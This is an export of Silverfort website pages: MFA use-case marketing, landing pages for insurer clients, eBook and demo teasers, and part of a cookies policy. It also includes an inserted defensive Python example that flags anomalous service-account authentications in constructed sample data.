Silverfort provides a seamless and innovative solution for multi-factor authentication (MFA) for Office 365, ensuring secure access to your data and applications. With Silverfort, you can add MFA protection to all your cloud and on-premises systems, without any agent or software installation required. Our unique platform uses AI-based risk analysis and adaptive authentication to detect and block any potential threats, while also enabling hassle-free user experience. Discover how Silverfort’s MFA solution can help you ensure the highest level of security for your Office 365 environment. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-teams/ Multi-factor authentication made simple for stronger team security with Silverfort. Silverfort provides a breakthrough solution for Multi-Factor Authentication (MFA) for Teams that delivers seamless security without compromising productivity. Silverfort enables adaptive authentication that dynamically adapts to changes in user behavior, risk factors, and threats. This eliminates the need for cumbersome and time-consuming authentication methods while enhancing protection against insider and external threats. Silverfort’s MFA for Teams will elevate your team’s security, streamline access control, and increase your overall efficiency and profitability. Experience the benefits of advanced authentication with Silverfort’s MFA for Teams today! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-remote-access/ Secure your remote access with Silverfort, the ultimate MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-root-user/ Elevate your security with Silverfort MFA – the ultimate solution for Root User protection. 
--- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-outlook/ Secure your Outlook with Silverfort MFA – the ultimate protection against unauthorized access. Silverfort is the perfect solution for businesses or organizations that use Outlook and need a reliable multi-factor authentication system. With Silverfort, you can secure your emails and data against cyber attacks by implementing a powerful MFA system that is designed to give you the utmost level of protection. Our solution is easy to install and use, and it works seamlessly with Outlook, ensuring that you can continue to work without disruption while keeping your sensitive information safe. With Silverfort, you can guarantee the highest level of security for your business or organization and protect yourself against the latest cyber threats. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-linux/ Strong authentication and risk-based adaptive policies to secure access to all your Linux servers and applications --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vpn/ Safeguarding your VPN remote access with Agentless MFA. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-forticlient-vpn/ Secure your VPN connections with ease – with Silverfort’s MFA for FortiClient VPN. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-palo-alto-vpn/ Uncompromising security for Palo Alto VPN with Silverfort’s seamless MFA solution. Silverfort provides a secure and seamless multi-factor authentication (MFA) solution for Palo Alto VPN. Using advanced AI technology, Silverfort can authenticate users and devices in real time, providing continuous protection against account takeover attacks, phishing, and other cyber threats.
Silverfort’s agentless and proxyless architecture allows it to secure all user resources without blind spots, including Palo Alto VPNs. It can enforce adaptive policies and advanced secure access controls across all resources, access interfaces, and users in the hybrid environment. Integrating Silverfort’s MFA with a Palo Alto VPN ensures that users accessing the network through the VPN must authenticate using more than just their primary credentials, such as through a one-time passcode, a mobile app notification, or other MFA methods. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-meraki-vpn/ Enforce MFA without requiring modifications to endpoints or servers for secure remote access. Silverfort’s solution for MFA for Meraki VPN offers advanced security and access control measures that protect organizations from cyber threats. With Silverfort, users can enjoy seamless access to Meraki VPN while ensuring the highest level of security through biometric and behavioral analysis technologies. Silverfort’s agentless approach and its ability to enforce MFA without requiring modifications to endpoints or servers make it a flexible choice for enhancing the security of VPN access, including those provided by Meraki. Silverfort also provides a unified platform that manages various authentication methods, including mobile apps, tokens, and biometrics, while enabling organizations to meet compliance requirements. Whether it’s preventing unauthorized access or identifying potential attacks, this extra layer of security is particularly important for VPNs, as they provide remote access to an organization’s internal network, and are therefore a crucial point to secure against unauthorized access. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vcenter/ Apply MFA protection for vCenter with Silverfort’s Advanced Solution. Silverfort is a cutting-edge cybersecurity solution that provides seamless multi-factor authentication (MFA) for vCenter. Our advanced technology replaces traditional MFA methods with a risk-based adaptive authentication protocol. Leveraging our AI-based technology, Silverfort enables secure access to vCenter for all users, including those coming from non-human and unmanaged sources. Say goodbye to cumbersome, time-consuming MFA processes. With Silverfort, you get lightning-fast, adaptive, and comprehensive MFA for vCenter that ensures maximum security without slowing you down. Try our solution today and experience the difference. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vmware/ Revolutionizing MFA for VMware: secure privileged access to vCenter, one authentication at a time. Silverfort is a cutting-edge cybersecurity solution that offers multi-factor authentication (MFA) for VMware environments. With its AI-driven risk engine, Silverfort provides adaptive and frictionless MFA across cloud, hybrid, and on-premises infrastructures for secure privileged access to vCenter. Our agentless architecture ensures zero downtime and easy deployment, while its granular policies allow for customizable security controls. Silverfort’s MFA solution for VMware ensures that only authorized users can access your virtual machines, ESXi hosts and their dependent components, protecting your business against cybersecurity threats and data breaches. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-juniper/ Secure access for the most complex networks with Silverfort’s cutting-edge MFA for Juniper. Silverfort is the next-generation solution for multi-factor authentication (MFA) for Juniper.
We offer an agentless solution that extends secure access to any sensitive resource, including those on-premises, in the cloud, and across hybrid environments. Our platform enables granular access controls and policy enforcement, as well as a seamless user experience across all applications. With Silverfort, you can integrate MFA into your existing infrastructure to reduce risk and improve your security posture. Get started today with Silverfort’s MFA for Juniper. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-jenkins/ Secure your Jenkins with ease – Silverfort’s MFA solution has got you covered. Silverfort offers a straightforward way to implement MFA for Jenkins. With Silverfort, organizations can give their users a secure and seamless experience, reducing reliance on passwords alone and protecting against identity theft and other cyber threats. The platform supports a wide range of authentication methods, including biometrics, smart cards, and push notifications, making it a flexible and adaptable MFA option. So if you want to secure your Jenkins environment and prevent unauthorized access, Silverfort has you covered. Try it today! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-jira/ Streamline Jira authentication with Silverfort’s MFA solution – safeguard your projects and productivity. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-web-applications/ Secure your web applications with ease – Silverfort’s MFA solution has you covered. Silverfort is a cybersecurity solution that provides multi-factor authentication (MFA) for web applications. With the growing threat of cyberattacks, it has become increasingly critical to have strong security controls in place to protect valuable information.
Silverfort uses adaptive risk analysis and machine learning to score the risk of each user’s login attempt, so that only authorized individuals can access sensitive data. With this technology, businesses can be confident that their web applications are protected against credential-based breaches. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-servers/ Secure your servers with ease using Silverfort’s MFA solution. Silverfort’s solution for multi-factor authentication for servers offers a different approach to securing corporate networks. Because its architecture is agentless, it integrates with any server without installing software on it or deploying additional hardware. It provides a comprehensive security solution that combines machine learning with adaptive access controls, making it possible to protect against even advanced threats. With Silverfort, organizations can secure their servers, meet regulatory and compliance requirements, and reduce the risk of unauthorized access to their sensitive information. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vdi/ Secure your virtual world seamlessly with Silverfort’s MFA solution for VDI. Silverfort provides a unified MFA (multi-factor authentication) solution for VDI (Virtual Desktop Infrastructure), addressing the security challenges of modern enterprises. Our platform integrates with your existing environment, allowing you to implement MFA across all your resources without changes to your applications, endpoints, or network. Silverfort’s AI-powered risk engine continuously analyzes user behavior and device health, applying adaptive authentication in real time to grant access to authorized users and block attackers, even when they hold stolen credentials.
Sign up today and safeguard your organization from the increasing threat of cyber attacks. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-network-devices/ Secure your network devices with ease, using Silverfort’s MFA solution! Networking devices including routers, switches, and firewalls are attractive targets for malicious actors seeking to exploit them, disrupt services, or gain unauthorized access to sensitive resources. Consequently, safeguarding networking devices has become a paramount concern, not only for the integrity and availability of data and services but also for overall organizational security. To address these challenges, Silverfort provides a multi-factor authentication (MFA) protection layer for all networking gear. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-b2b/ Implement secure access with Silverfort’s MFA solution – protecting your B2B network has never been easier. Silverfort offers a solution for B2B companies to secure their networks with multi-factor authentication (MFA). Its platform integrates with any system or application, providing seamless MFA for all users and devices. With Silverfort, businesses can protect valuable data, prevent unauthorized access, and comply with regulatory requirements without compromising user experience. Say goodbye to clunky and inconvenient authentication methods, and hello to simple, yet robust security with Silverfort. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-business/ Deploy secure authentication without compromise with Silverfort’s MFA solution for businesses. Silverfort is an MFA (multi-factor authentication) solution for businesses that helps prevent unauthorized access to sensitive data by adding an extra layer of security.
Silverfort integrates with existing authentication systems and works with a range of authentication methods, including biometrics and one-time passwords. This makes it easier for businesses to manage access to their systems and data, while also reducing the risk of data breaches. With Silverfort, businesses can have peace of mind knowing that their data is protected by an advanced MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-user-interface-logins/ Securing your digital world with seamless MFA for every UI, powered by Silverfort. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-healthcare/ Protecting patient data with peace of mind – Silverfort’s seamless MFA solution for healthcare. Silverfort provides an authentication platform that ensures secure access to sensitive healthcare data. Its Multi-Factor Authentication (MFA) solution protects against identity theft, privileged access abuse, and other security risks. With Silverfort, healthcare organizations can unify and manage all MFA policies across their enterprise, saving time and improving compliance. With features such as adaptive authentication, continuous risk assessment, and zero-trust capabilities, Silverfort makes MFA easy and effective for medical professionals and patients. Protect your healthcare data with Silverfort today. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-aws-workspaces/ Secure AWS Workspaces with ease – Silverfort’s MFA solution has got you covered! Silverfort provides a Multi-Factor Authentication (MFA) solution for AWS Workspaces that allows organizations to strengthen their security posture by securing access to critical resources.
With Silverfort, users can log in securely to AWS Workspaces using their preferred authentication method, including biometric or contextual factors. This reduces reliance on passwords alone, making your workspace deployments more secure. By streamlining authentication workflows, Silverfort reduces the risk of cyber breaches and helps ensure compliance with regulatory requirements. --- - Published: 2023-07-25 - Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-travelers-customers/ Welcome Travelers Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access policies to alert on or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that relies on neither agents nor proxies, with no code changes required, ensures the solution is fully deployed in days Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. --- - Published: 2023-07-07 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-ins-requirements-thn-em-jul23/ Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky.
As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2023-06-26 - Modified: 2025-08-25 - URL: https://www.silverfort.com/partners/microsoft/ Silverfort & Microsoft Silverfort and Microsoft’s product integrations help organizations to consolidate their IAM across hybrid environments, extend identity protection to any asset, and simplify cloud migration Silverfort Integrations with the Microsoft Ecosystem Entra ID Consolidate the identity protection of all on-prem and cloud resources in Entra ID (formerly Azure AD), making it a single interface to configure access policies for your entire hybrid environment Defender Suite Trigger MFA protection as a follow-up to Defender’s detection of identity threats, complementing it with real-time prevention Azure MFA Extend Azure MFA to resources that couldn’t be protected with MFA before ADFS Protect access of all users to SaaS applications and on-prem resources from a single interface with full context to all user activities in the hybrid environment “The integration with Silverfort allows customers to extend the power and flexibility of Entra ID to many additional resources and applications across hybrid and multi-cloud environments, and unify their identity management and protection on Entra ID. ” Sue Bohn | Partner Director, Microsoft Identity Division --- - Published: 2023-06-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-alliant-customers/ Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. 
Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. --- - Published: 2023-06-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-insuretrust-customers/ Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. --- - Published: 2023-05-22 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-dark-side-of-ransomware-protection-ppc/ Can you block lateral movement? Ransomware attacks are a top concern for enterprise security stakeholders, particularly the pairing of ransomware with automated propagation. Download this eBook to learn: What are the security gaps in traditional MFA solutions? What makes propagation a blind spot for today’s security products? How does Silverfort’s Unified Identity Protection platform proactively prevent ransomware propagation? And more --- - Published: 2023-05-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/find-a-partner/ We are all about matching you with the right partner. Looking for a specific reseller? Need an identity specialist to help with your IAM projects? We’ll find your perfect match. Just complete a few questions, and someone on our team will contact you soon. --- - Published: 2023-04-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-de/ What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or on-site demo. 
--- - Published: 2023-04-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-fr/ What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or on-site demo. --- - Published: 2023-04-20 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-mfa-ad-fr/ Fill out this form to schedule a demo. If you run Active Directory, it is likely that many authentications and access paths are not protected by MFA: for example legacy applications, command-line tools (PowerShell, PsExec, WMI... ) or file shares. Here is how the conversation will go: We will listen to you and understand your needs. Give a demo that addresses your concerns. Answer your questions. --- - Published: 2023-04-18 - Modified: 2024-09-10 - URL: https://www.silverfort.com/silverfort-for-at-bay-customers/ Welcome At-Bay Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. REGISTER HERE 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access policies to alert on or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that relies on neither agents nor proxies, with no code changes required, ensures the solution is fully deployed in days Learn More About the Silverfort Platform --- - Published: 2023-04-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-ppc/ Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2023-04-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-aig-clients/ Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread.
Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. --- - Published: 2023-04-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/re-evaluate-your-mfa-are-you-as-protected-as-you-should-be/ Multi-factor Authentication (MFA) protection is a key component in any organization’s security stack, but ultimately, only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. In this eBook, we’ll explore the critical importance of comprehensive MFA protection and a number of other topics, including: What are the security gaps in traditional MFA solutions? How can you assess your existing MFA protection to better understand your risk exposure? How can you gain end-to-end MFA coverage for all your cloud and on-prem resources? And more --- - Published: 2023-03-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/leading-manufacturer-averts-lateral-movement/ The manufacturing industry has become a ripe target for cyber-attacks over the last decade. Whether due to vulnerable hybrid environments, unprotected legacy systems or simply because they’re susceptible to highly disruptive attacks, manufacturing firms have become a highly lucrative target for threat actors. This report highlights how one leading manufacturer beat the odds and stopped a lateral movement attack on their supply chain right in its tracks. 
Explore this case study to learn about: Typical supply chain risks in the interconnected cyber space New types of lateral movement attacks Mitigating the risk of NTLM authentications Utilizing Silverfort’s logs for early threat detection And more --- - Published: 2023-03-20 - Modified: 2024-11-04 - URL: https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-thn/ There are countless service accounts in any given organization and today, the number of these non-human accounts, and the number of applications that rely on them, is growing each day. These accounts can become high-risk assets that, if left unchecked, may enable threats to propagate throughout the network undetected. Download this eBook to learn how to: Automatically detect all service accounts Monitor and analyze the use of these sensitive accounts Recommend policies that can easily be turned on to secure the use of these accounts Actively prevent account takeover and alert on suspicious behavior --- - Published: 2023-03-01 - Modified: 2024-11-04 - URL: https://www.silverfort.com/webinar-on-demand-can-you-block-lateral-movement-in-real-time/ https://www.youtube.com/watch?v=SgyVeXoG-cc --- - Published: 2023-02-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-insurance-free-assessment/ GET A FREE IDENTITY SECURITY ASSESSMENT Identify the MFA and privileged access protection gaps you must resolve to qualify for a cyber insurance policy Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment so you can meet your insurer’s requirements: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2023-01-08 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-hybrid-iam-azure-ebook-de/ Win against advanced threat actors with comprehensive, cross-resource least-privilege access. Identity-based attacks have grown in sophistication and scale. The ability to proactively prevent the common scenario in which an attacker uses compromised credentials for malicious access is now a must. In our eBook you will learn how Silverfort and Azure AD let you achieve true identity Zero Trust in just three simple steps. Want to learn more? Download the eBook today. Further information is available on the Microsoft Azure Marketplace. --- - Published: 2023-01-08 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-cyber-insurance-ebook-de/ Everyone knows the value of cyber insurance, but keeping up with cyber insurance requirements can be difficult. As ransomware attacks increase worldwide, it becomes ever harder to comply with the checklist of resources requiring MFA coverage. We help you get an overview of what you need.
Download this eBook to learn more: Which types of MFA are required for cyber liability insurance. How to evaluate cyber insurance solutions. How to meet MFA insurance requirements with minimal disruption to your network. --- - Published: 2023-01-08 - Modified: 2024-11-04 - URL: https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-lp-de/ There are countless service accounts in any organization, and the number of these non-human accounts, and of the applications that depend on them, grows daily. Left unchecked, these accounts can become high-risk assets that let threats propagate undetected throughout the network. Download this eBook to learn how to: Automatically detect all service accounts. Monitor and analyze the use of these sensitive accounts. Recommend policies that can easily be turned on to secure the use of these accounts. Actively prevent account takeover and alert on suspicious behavior. --- - Published: 2022-12-13 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-mfa-fr/ Fill out this form to schedule a demo. If you run Active Directory, it is likely that many authentications and access paths are not protected by MFA: for example legacy applications, command-line tools (PowerShell, PsExec, WMI... ) or file shares. Here is how the conversation will go: We will listen to you and understand your needs. Give a demo that addresses your concerns. Answer your questions. --- - Published: 2022-11-16 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-hybrid-iam-consolidation-azure-ad-fr/ Win against attackers by applying strengthened, generalized access control to AD authentications using Azure AD.
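The service-account eBook teasers above list four steps: discover the accounts, monitor and analyze how they are used, recommend a policy, and block or alert when an account is misused. The following is an added example of that baseline-and-deviate logic, written for this page; it is not Silverfort’s product code. The authentication events are constructed, the field names are assumptions, the heuristics for telling a service account from a human user are illustrative, and the allow/alert/block policy is one possible choice, not the one any product ships with.

```python
"""Baseline-and-deviate check for service accounts (added example, not Silverfort code).

Steps, mirroring the eBook teaser:
  1. discover service accounts from authentication events;
  2. build a per-account baseline of sources, destinations and logon types;
  3. derive a policy from the baseline;
  4. alert on, or block, an authentication that falls outside it.
All events below are constructed for the example. In a real deployment they
would come from domain-controller security events or an identity provider's
audit stream; the field names here are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass

INTERACTIVE = {"interactive", "remote_interactive"}


@dataclass(frozen=True)
class AuthEvent:
    user: str        # account name
    src_host: str    # host the authentication came from
    dst_host: str    # resource being accessed
    logon_type: str  # "service", "network", "interactive", "remote_interactive"


# Constructed sample history (not real log data).
HISTORY = [
    # svc_backup: one fixed source, two destinations, never interactive
    AuthEvent("svc_backup", "BACKUP01", "FS01", "network"),
    AuthEvent("svc_backup", "BACKUP01", "FS01", "network"),
    AuthEvent("svc_backup", "BACKUP01", "FS01", "network"),
    AuthEvent("svc_backup", "BACKUP01", "FS02", "service"),
    AuthEvent("svc_backup", "BACKUP01", "FS02", "service"),
    # svc_sql: two application servers talking to one database host
    AuthEvent("svc_sql", "APP01", "SQL01", "service"),
    AuthEvent("svc_sql", "APP01", "SQL01", "service"),
    AuthEvent("svc_sql", "APP01", "SQL01", "service"),
    AuthEvent("svc_sql", "APP02", "SQL01", "network"),
    AuthEvent("svc_sql", "APP02", "SQL01", "network"),
    # jdoe: a human, with varied sources and interactive logons
    AuthEvent("jdoe", "WKS-017", "DC01", "interactive"),
    AuthEvent("jdoe", "WKS-017", "FS01", "network"),
    AuthEvent("jdoe", "VPN-GW", "DC01", "remote_interactive"),
    AuthEvent("jdoe", "LAPTOP-9", "FS01", "network"),
    # svc_temp: too little history to classify yet
    AuthEvent("svc_temp", "APP03", "FS02", "network"),
]


def discover_service_accounts(events, min_events=4, max_sources=2):
    """Step 1: accounts seen often enough to judge, never interactively, and
    always from a small fixed set of hosts. Human users fail the last two tests."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e.user].append(e)
    found = set()
    for user, evs in by_user.items():
        if len(evs) < min_events:
            continue
        if any(e.logon_type in INTERACTIVE for e in evs):
            continue
        if len({e.src_host for e in evs}) <= max_sources:
            found.add(user)
    return found


def build_baseline(events, accounts):
    """Step 2: per account, the sources, destinations and logon types seen so far."""
    baseline = {u: {"src": set(), "dst": set(), "logon_type": set()} for u in accounts}
    for e in events:
        if e.user in baseline:
            baseline[e.user]["src"].add(e.src_host)
            baseline[e.user]["dst"].add(e.dst_host)
            baseline[e.user]["logon_type"].add(e.logon_type)
    return baseline


def evaluate(event, baseline):
    """Steps 3 and 4: the policy derived from the baseline, applied to one new event.
    Returns (verdict, reasons) with verdict 'allow', 'alert' or 'block'.
    Policy (an assumption for this example): an interactive logon or a never-seen
    source host looks like stolen credentials used from elsewhere and is blocked;
    a new destination from a known source is lateral movement or a config change
    and is only alerted on."""
    b = baseline.get(event.user)
    if b is None:
        return "allow", []  # not a service account under this policy
    reasons = []
    if event.logon_type in INTERACTIVE:
        reasons.append(f"interactive logon ({event.logon_type})")
    if event.src_host not in b["src"]:
        reasons.append(f"new source host {event.src_host}")
    if event.dst_host not in b["dst"]:
        reasons.append(f"new destination {event.dst_host}")
    if not reasons:
        return "allow", []
    severe = event.logon_type in INTERACTIVE or event.src_host not in b["src"]
    return ("block" if severe else "alert"), reasons


if __name__ == "__main__":
    accounts = discover_service_accounts(HISTORY)
    policy = build_baseline(HISTORY, accounts)
    for ev in (
        AuthEvent("svc_backup", "BACKUP01", "FS01", "network"),        # normal
        AuthEvent("svc_backup", "WKS-042", "DC01", "network"),         # creds used from a workstation
        AuthEvent("svc_sql", "APP01", "FS02", "network"),              # known source, new target
        AuthEvent("svc_sql", "APP01", "SQL01", "remote_interactive"),  # RDP with a service account
    ):
        print(ev.user, ev.src_host, "->", ev.dst_host, evaluate(ev, policy))
```

Run as a script it prints an allow, two blocks and one alert for the four probe events. In practice a policy like this is first run in alert-only mode for long enough to capture the account's full cycle (month-end jobs, failover hosts) before switching to block, because a false positive here stops a production application rather than a user.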
The solution is available directly in the Microsoft marketplace. In our eBook, explore how Silverfort, connected to your AD and Azure AD, lets you implement identity Zero Trust in just 3 steps. Ready to learn more? Download the eBook today. --- - Published: 2022-11-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-4-steps-to-comprehensive-service-account-security-fr/ Service accounts are now widely used in enterprises, and the number of applications that depend on them grows every day. But these accounts can become targets for attackers, letting them spread through your infrastructure. Download this guide to learn how to: Automatically detect all service accounts. Monitor and analyze the use of these highly privileged accounts. Put in place access policies that secure them without modifying your applications or changing your passwords. Actively prevent takeover of these accounts and detect abnormal behavior. --- - Published: 2022-10-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-ci/ Fill out the form to schedule a demo. Need to apply MFA to privileged accounts or legacy applications to comply with cyber insurance requirements? We’ve got you covered. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2022-10-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-mfa/ Fill out the form to schedule a demo. If you have MFA but your legacy apps, command line interfaces or fileshares are not protected, it’s like locking the front door while the back door is wide open. But no worries, we can help. Here’s what happens when you speak with us: We’ll listen.
We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2022-08-31 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-service-accounts-ebook/ --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-re-evaluate-your-mfa-protection-ebook/ --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-rethinking-ransomware-protection-ebook/ --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-silverfort-adaptive-authentication-white-paper/ --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-protecting-the-unprotectable-white-paper/ --- - Published: 2022-08-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp/ Fill out the form to schedule a demo. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered.
--- - Published: 2022-07-26 - Modified: 2025-08-21 - URL: https://www.silverfort.com/company/cookies-policy/ We use cookies and similar files or technologies to automatically collect and store information about your computer, device, and Site usage, in order to improve their performance and enhance your user experience. We use the general term “cookies” in this policy to refer to these technologies and all such similar technologies that collect information automatically when you are using our Site where this policy is posted. You can find out more about cookies and how to control them in the information below. If you do not accept the use of these cookies, please disable them using the instructions in this cookie policy or by changing your browser settings so that cookies from this Site cannot be placed on your computer or mobile device. Important: disabling cookies on this site may seriously cripple the user experience and other features on the Site and Services, to the point of rendering them useless. In this Cookies Policy, we use the term Silverfort (and “we”, “us” and “our”) to refer to Silverfort, Inc. This Cookies Policy, along with our Privacy Policy available at https://www.silverfort.com/company/privacy-policy forms part of our Terms and Conditions, available at https://www.silverfort.com/company/terms-of-use/. Capitalized terms not otherwise defined in this Cookies Policy have the same meaning given in our Terms and Conditions. What is a cookie? Cookies are computer files containing small amounts of information which are downloaded to your computer or mobile device when you visit a website. Cookies can then be sent back to the originating website on each subsequent visit, or to another website that recognizes that cookie. Cookies are widely used in order to make websites work, or to work more efficiently, as well as to provide information to the owners of the site.
Cookies do lots of different jobs, like letting you navigate between pages efficiently, remembering your preferences, and generally improving the user experience. Cookies may tell us, for example, whether you have visited our Site before or whether you are a new visitor. There are two broad categories of cookies: First party cookies, served directly by us to your computer or mobile device. Third party cookies, which are served by a third party on our behalf. We use third party cookies for functionality, performance / analytics, and social media purposes. Cookies can remain on your computer or mobile device for different periods of time. Some cookies are ‘session cookies’, meaning that they exist only while your browser is open. These are deleted automatically once you close your browser. Other cookies are ‘permanent cookies’, meaning that they survive after your browser is closed. They can be used by websites to recognize your computer when you open your browser and browse the Internet again. We may also use web beacons or other similar cookie technologies. When a visitor accesses our Site, a non-identifiable notice of that visit is generated which may be processed by us or by third parties. These web beacons usually work in conjunction with cookies. If you don’t want your cookie information to be associated with your visits to these pages, you can set your browser to turn off cookies as described further below. If you turn off cookies, web beacons and other technologies will still detect your visits to our Site; however, they will not be associated with information otherwise stored in cookies. How do we use cookies? We use cookies to: track traffic flow and patterns of travel in connection with our Site; understand the total number of visitors to our sites on an ongoing basis and the types of internet browsers (e.g. Chrome, Firefox, Safari, or Internet Explorer) and operating systems (e.g.
